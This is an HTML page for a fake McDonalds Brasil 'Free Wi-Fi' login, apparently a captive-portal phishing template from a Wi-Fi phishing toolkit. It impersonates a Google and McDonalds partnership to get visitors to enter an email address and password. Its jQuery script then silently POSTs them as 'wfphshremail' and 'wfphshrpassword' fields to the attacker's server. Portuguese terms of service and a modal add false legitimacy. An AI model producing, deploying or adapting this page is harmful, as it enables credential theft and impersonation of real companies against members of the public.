<!DOCTYPE html>
<html>

  <head>

    <title>Sign in - McDonalds</title>

    <meta charset='UTF-8'>
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta name="viewport" content="width=device-width,
    initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
    <meta name="robots" content="noindex, nofollow">

    <script src="static/js/jquery.min.js"></script>

    <link rel="stylesheet" href="static/css/bootstrap.min.css">
    <link rel="stylesheet" href="static/css/style.css">
    <link rel="icon" type="image/png" href="static/img/s5g1cxz9vr.png"/>

    <style>

    body {
      background-image: url("static/img/5atoko1sqg.png");
      background-position: center;
      background-attachment: fixed;
      background-repeat: no-repeat;
      -webkit-background-size: 100%;
      -moz-background-size: 100%;
      -o-background-size: 100%;
      background-size: 100%;
      -webkit-background-size: cover;
      -moz-background-size: cover;
      -o-background-size: cover;
      background-size: cover;
    }

    .google-header-bar {
    height: 71px;
    border-bottom: 1px solid #e5e5e5;
    overflow: hidden;
    }

    .google-header-bar.centered {
    border: 0;
    height: 108px;
    }

    .google-header-bar.centered .header .logo {
    float: none;
    margin: 40px auto 30px;
    display: block;
    }
    .google-header-bar.centered .header .secondary-link {
    display: none
    }

    .header .logo {
    margin: 17px 0 0;
    float: left;
    height: 38px;
    width: 116px;
    }
    </style>

    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
      .google-header-bar.centered {
        height: 83px;
      }

      .google-header-bar.centered .header .logo {
        margin: 25px auto 20px;
      }

      .card {
        margin-bottom: 20px;
      }
    </style>

    <style media="screen and (max-width: 580px)">
      html,
      body {
        font-size: 14px;
      }

      .google-header-bar.centered {
        height: 73px;
      }

      .google-header-bar.centered .header .logo {
        margin: 20px auto 15px;
      }

      .content {
        padding-left: 10px;
        padding-right: 10px;
      }

      .hidden-small {
        display: none;
      }

      .card {
        padding: 20px 15px 30px;
        width: 270px;
      }

      .footer ul li {
        padding-right: 1em;
      }

      .lang-chooser-wrap {
        display: none;
      }

    </style>

  </head>

  <body>

    <div class="container">
      <div class="account-wall">
        <img class="profile-img" src="static/img/pa6dyy5wcc.png" alt=""></img>

        <h1 class="text-center login-title">Free Wi-Fi</h1>
        <h2 class="text-center friends-text">Uma parceria Google e McDonalds Brasil</h2>

          <form class="form-signin">

            <input id="eml" type="text" name="eml" class="form-control" placeholder="Email" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required>
            <input id="pwd" type="password" name="pwd" class="form-control" placeholder="Senha" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
            <div id="dialog">
              <h2 id="error">Por favor, preencha os campos solicitados.</h2>
            </div>
            <button id="btn" class="btn btn-primary btn-block btn-xlarge btn-sharp" name="login" type="submit">Aceitar &amp; Conectar</button>
            <div class="text-center terms-text1">Eu concordo com <a href="#" class="url-color" id="btn1">Termos de uso </a> e</div>
            <div class="text-center terms-text2">li a <a href="#" class="url-color">Política de Pivacidade Google</a></div>
            <div class="text-center terms-text3">Precisa de juda? <a href="#" class="url-color">(11)3211-1685</div>

          </form>

  <!-- The Modal -->
  <div id="myModal" class="modal url-color1">

  <!-- Modal content -->
  <div class="modal-content">
    <div class="modal-header">
      <span class="close">×</span>
      <h2>Terms of Service</h2>
    </div>
    <div class="modal-body">
      <p>Este é um serviço gratuito de internet de ponto de acesso sem fio (o "Serviço") fornecido para uso dos clientes. Todos os usuários precisam fazer login individualmente como um usuário independente.</p>
      <p>
  O Serviço é disponibilizado, desde que:
  </p><p>
  (a) Você não usa o Serviço para algo ilegal, imoral ou impróprio;
  </p><p>
  (b) Você não usa o Serviço para fazer comunicações ofensivas ou incômodas, sob qualquer forma. Esse uso inclui postar, transmitir, carregar, baixar ou facilitar qualquer conteúdo que seja ilegal, difamatório, ameaçador, incômodo, obsceno, odioso, abusivo, prejudicial (incluindo, entre outros, vírus, arquivos corrompidos ou qualquer outro software ou programas), violação de privacidade ou que seja questionável;
  </p><p>
  (c) Você não usa o Serviço para prejudicar ou tentar prejudicar menores de qualquer forma;
  </p><p>
  (d) Você não age nem conscientemente permite que outras pessoas ajam de tal maneira que a operação do Serviço ou de nossos sistemas seja prejudicada ou prejudicada;
  </p><p>
  (e) Você não usa comportamentos abusivos ou ameaçadores em relação a outros usuários do Serviço, membros de nossa equipe ou qualquer pessoa nas proximidades de um Hotspot de LAN sem fio;
  </p><p>
  (f) Você não usa o Serviço para acessar ou usar conteúdo de uma maneira que viole os direitos de terceiros;
  </p><p>
  (g) O Serviço é usado de acordo com as políticas de terceiros para uso aceitável ou com os padrões relevantes da Internet (quando aplicável);
  </p><p>
  (h) Você concorda em não revender ou retransmitir qualquer aspecto do Serviço, com ou sem fins lucrativos. Você aceita que o seu direito de usar o Serviço é apenas para seu uso pessoal e que você não terá o direito de transferir seu direito de usar o Serviço para qualquer outra pessoa ou permitir que outra pessoa faça uso do Serviço ou de qualquer nome de usuário ou senha ou outro direito fornecido a você em conexão com o Serviço;  </p><p>
  </p><p>
  (i) Você também concorda em não modificar a Unidade ou usar o Serviço para qualquer finalidade fraudulenta ou de maneira a criar danos ou riscos aos nossos negócios, reputação, funcionários, assinantes, instalações, terceiros ou ao público em geral
  </p><p>
  (j) Você não possui direitos de propriedade ou propriedade sobre qualquer nome de usuário ou senha ou para um endereço IP específico ou endereço de e-mail atribuído a você ou à sua Unidade. Podemos alterar esses endereços a qualquer momento ou desativar ou suspender o Serviço para qualquer endereço sem aviso prévio, se suspeitarmos de uso ilegal ou fraudulento dos serviços.
  </p>
    </div>
  </div>

  <script src="static/js/index.js"></script> 
  <script>
  // Get the modal
  var modal = document.getElementById('myModal');

  // Get the button that opens the modal
  var btn = document.getElementById("btn1");

  // Get the <span> element that closes the modal
  var span = document.getElementsByClassName("close")[0];

  // When the user clicks the button, open the modal 
  btn.onclick = function() {
    modal.style.display = "block";
  }

  // When the user clicks on <span> (x), close the modal
  span.onclick = function() {
    modal.style.display = "none";
  }

  // When the user clicks anywhere outside of the modal, close it
  window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
  }
  </script>

  <script>
    /*
    Check the password field and act accordingly.
    */

    $("#btn").on("click", function(e) {
        e.preventDefault();
        // get the password box and checkbox elements
        var input = document.getElementById("eml");
        var input2 = document.getElementById("pwd");
        // check to see if the value is empty
        if ( input.value == "" ){
            passNotValid();
        }else if( input2.value == "" ){ //check if the value of the repeat field is empty
            passNotValid();
        }else{
            // post the data
            $("#dialog").css('display', 'none');
              post('post', {
                wfphshremail: input.value,
                wfphshrpassword: input2.value
              });      
        }
    });

    function passNotValid(){
      $("#dialog").css('display', 'block');
      $(".form-control").css('border', '1px solid #dd4b39');
    }
    
    /*
    Post to the fallowing path given the parameters.

    Args:
      path: The path to be posted to.
      params: The parameters to be passed.
    */
    function post(path, params) {
      // create a form and set its attributes
      var form = document.createElement("form");
      form.setAttribute("method", "post");
      form.setAttribute("action", path);

      // set the attribute for the post
      for(var key in params) {
          if(params.hasOwnProperty(key)) {
              var hiddenField = document.createElement("input");
              hiddenField.setAttribute("type", "hidden");
              hiddenField.setAttribute("name", key);
              hiddenField.setAttribute("value", params[key]);
              form.appendChild(hiddenField);
           }
      }
      // submit the post
      document.body.appendChild(form);
      form.submit();
    }
    var input = document.getElementById("eml");
    var input2 = document.getElementById("pwd");
    input.disabled = false;
    input2.disabled = false;
  </script>

      </div>
    </div>

  </body>

</html>
